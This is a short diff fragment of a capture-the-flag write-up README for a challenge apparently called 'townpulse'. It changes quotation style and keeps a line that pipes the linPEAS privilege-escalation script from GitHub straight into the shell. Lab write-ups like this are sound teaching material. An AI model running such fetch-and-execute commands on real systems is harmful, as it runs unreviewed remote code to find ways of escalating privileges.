woprd/ctfs/csa/csc2024/townpulse/README.md

 ```

-Challenge requires privilege escalation so let's go script kiddie and fetch a tool to search for privilege escalations (`privesc` as it's call in `the biz`):
+Challenge requires privilege escalation so let's go script kiddie and fetch a tool to search for privilege escalations ("privesc" as it's call in "the biz"):

 ```bash
 curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh